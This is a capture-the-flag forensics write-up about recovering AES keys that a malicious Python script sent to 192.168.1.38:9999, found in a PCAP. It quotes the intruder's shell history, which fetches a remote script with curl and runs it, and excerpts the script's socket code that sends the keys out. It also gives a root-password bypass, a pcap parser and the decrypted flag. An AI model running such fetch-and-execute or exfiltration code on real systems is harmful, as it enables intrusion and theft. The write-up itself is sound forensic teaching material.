Tags: forensics pcap python 

In this challenge we were presented with an OVA archive. After importing and running the VM we had to reset the root password. A common method is to boot with init=/bin/sh appended to the kernel command line in GRUB, remount the root filesystem read-write (it comes up read-only in that shell) and run passwd.

Then we extracted the relevant files from /home, which contained two users: prod and test.

So let's find out what has happened on the system:

.bash_history for test had the following entries:

curl http://192.168.1.38/clev.py > .s.py
curl http://192.168.1.38:8080/clev.py > .s.py
curl http://192.168.1.38:8888/clev.py > .s.py
curl http://192.168.1.38:1111/clev.py > .s.py
file .s.py
python3.7 .s.py 
rm .s.py
...

So someone tried several ports, downloaded a script, executed it with python3.7 and then removed it. The encrypted file /home/test/data/secrets.txt.enc is our likely candidate for the flag. Since the script itself was deleted, we have to find it somewhere else.

/home/prod included a PCAP file. A quick filter for port 1111 (the last curl attempt, so presumably the one that succeeded) revealed the obfuscated Python script being served. Some observations:

  for x in o(16):
   p=''.join(random.choices(C,k=16))
   M.append(p)

p is reassigned on every iteration, so whatever uses p after the loop only ever sees the last of the 16 generated strings; M keeps all 16 of them. In other words, only the last value of p is used in the encryption.

  u=','.join(k for k in M)
  u=W(u,"utf-8")
  u=base64.b64encode(u)
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect(g)
  s.sendall(W(Q.id,"utf-8"))
  s.recv(1)
  s.sendall(u)

This sends the whole comma-separated, base64-encoded key list to another server (g, which is 192.168.1.38:9999), after first sending a machine ID (Q.id) and waiting for a one-byte acknowledgement.

A quick look at the PCAP confirms this: the script sends an ID for the machine, receives one byte back, then sends all 16 keys in base64 encoding:

bVRHZWxqaERSS0FTS0toUSxGTHJzU0V2ZVFRaWxvUFJuLFhlZFhIWUJVSHBJWERCSlAsSU9HUEVyam9zeE5pUXJOTSxSenZwYkVVUkxkRmZhR0ZNLHZkQlZEQ3ZpeGpTaENRdnksRVFsY3NuVXR6Q0h5RlBITSxKa0RpamdBRmlWQldKYUx6LGdoY1BJT1NxQ2RDVHFPcEQsRG5lQ3dia0RIa29qcHBIbSxsVlJaUmVBbGFJekhnaXNjLE5kamNnVlZqaWlueGZ0Q0MsUmtnTHBSQ3FybmlicnFzTixremV3dGVBZ1BFWmRrelFKLEhucEdvVWVxY2tFcXhwUW0sTFNOV1JhclRoUmRpUExwTQ==

Base64 decoding gives us the keys:

mTGeljhDRKASKKhQ,FLrsSEveQQiloPRn,XedXHYBUHpIXDBJP,IOGPErjosxNiQrNM,RzvpbEURLdFfaGFM,vdBVDCvixjShCQvy,EQlcsnUtzCHyFPHM,JkDijgAFiVBWJaLz,ghcPIOSqCdCTqOpD,DneCwbkDHkojppHm,lVRZReAlaIzHgisc,NdjcgVVjiinxftCC,RkgLpRCqrnibrqsN,kzewteAgPEZdkzQJ,HnpGoUeqckEqxpQm,LSNWRarThRdiPLpM
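Pulling the keys out of the capture can be done without Wireshark. The following is an added example written for this writeup, not code from the challenge or from the original post: it parses a classic libpcap file with the standard library only, groups the client-to-server bytes into messages using the server's one-byte reply as the delimiter (the s.recv(1) in the script), and base64-decodes the key list. The capture it parses is constructed inline; the attacker address and port and the key values are taken from the writeup, while the victim address, the client port, the machine ID and the way the upload is split into two TCP segments are assumptions.

```python
import base64
import struct

# From the writeup: attacker address/port and the 16 keys. The victim address,
# client port, machine ID and the segmentation of the upload are assumptions.
ATTACKER_IP = "192.168.1.38"
EXFIL_PORT = 9999
VICTIM_IP = "192.168.1.50"
KEYS_FROM_WRITEUP = (
    "mTGeljhDRKASKKhQ,FLrsSEveQQiloPRn,XedXHYBUHpIXDBJP,IOGPErjosxNiQrNM,"
    "RzvpbEURLdFfaGFM,vdBVDCvixjShCQvy,EQlcsnUtzCHyFPHM,JkDijgAFiVBWJaLz,"
    "ghcPIOSqCdCTqOpD,DneCwbkDHkojppHm,lVRZReAlaIzHgisc,NdjcgVVjiinxftCC,"
    "RkgLpRCqrnibrqsN,kzewteAgPEZdkzQJ,HnpGoUeqckEqxpQm,LSNWRarThRdiPLpM"
)


def _frame(src_ip, dst_ip, sport, dport, seq, payload):
    """Ethernet/IPv4/TCP frame with zeroed checksums (the parser below does not verify them)."""
    eth = bytes(12) + struct.pack("!H", 0x0800)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0x4000,
                     64, 6, 0, bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Little-endian libpcap file, link type 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000, i, len(frame), len(frame)) + frame
    return out


def sample_capture():
    """Constructed capture of the exchange: ID, one-byte ack, then the base64 key list
    split over two segments so that reassembly is exercised."""
    blob, cut = base64.b64encode(KEYS_FROM_WRITEUP.encode()), 100
    return build_pcap([
        _frame(VICTIM_IP, ATTACKER_IP, 40210, EXFIL_PORT, 1, b"victim-7c1e"),
        _frame(ATTACKER_IP, VICTIM_IP, EXFIL_PORT, 40210, 1, b"\x00"),
        _frame(VICTIM_IP, ATTACKER_IP, 40210, EXFIL_PORT, 12, blob[:cut]),
        _frame(VICTIM_IP, ATTACKER_IP, 40210, EXFIL_PORT, 12 + cut, blob[cut:]),
    ])


def iter_tcp_payloads(pcap):
    """Yield (src, sport, dst, dport, seq, payload) for every TCP segment carrying data.
    Handles both pcap byte orders; IPv4 over Ethernet only."""
    end = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(pcap[:4])
    if end is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack(end + "I", pcap[20:24])[0] != 1:
        raise ValueError("only link type 1 (Ethernet) is handled")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(end + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        total_len = struct.unpack("!H", frame[16:18])[0]
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = frame[14 + ihl:14 + total_len]  # total_len drops any Ethernet trailer padding
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield src, sport, dst, dport, seq, payload


def client_messages(pcap, server_ip, server_port):
    """Split client->server bytes into messages, using each server reply as delimiter.
    Assumes the capture lists packets in transmission order."""
    messages, current = [], b""
    for src, sport, dst, dport, _seq, payload in iter_tcp_payloads(pcap):
        if (dst, dport) == (server_ip, server_port):
            current += payload
        elif (src, sport) == (server_ip, server_port) and current:
            messages.append(current)
            current = b""
    if current:
        messages.append(current)
    return messages


def recover_keys(pcap, server_ip=ATTACKER_IP, server_port=EXFIL_PORT):
    """Return (machine_id, keys) and check that every key has AES-128 length."""
    machine_id, blob = client_messages(pcap, server_ip, server_port)[:2]
    keys = base64.b64decode(blob, validate=True).decode().split(",")
    if any(len(k) != 16 for k in keys):
        raise ValueError("unexpected key length in exfil blob")
    return machine_id.decode(), keys


if __name__ == "__main__":
    machine_id, keys = recover_keys(sample_capture())
    print(machine_id, len(keys), "keys; last one:", keys[-1])
```

On the real capture you would replace sample_capture() with open("capture.pcap", "rb").read(); if the file is a pcapng rather than classic pcap, convert it first (for example with editcap), since the parser deliberately only understands the 24-byte libpcap header.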

So in order to decrypt the file we take the last of the 16 keys (LSNWRarThRdiPLpM). If that reasoning is in doubt, trying all 16 is cheap: only the right key yields valid PKCS#7 padding and readable text.

>>> from Crypto.Cipher import AES
>>> from Crypto.Util.Padding import unpad
>>> f1 = open("secrets.txt.enc", "rb").read()
>>> c = AES.new(b"LSNWRarThRdiPLpM", AES.MODE_ECB)  # PyCryptodome needs a bytes key, not str
>>> c.decrypt(f1)
b'flag{26c08ad080830d6dcd76c15009ab6b03}\n\t\t\t\t\t\t\t\t\t'
>>> unpad(c.decrypt(f1), AES.block_size)  # the nine tabs are PKCS#7 padding: 9 bytes of 0x09
b'flag{26c08ad080830d6dcd76c15009ab6b03}\n'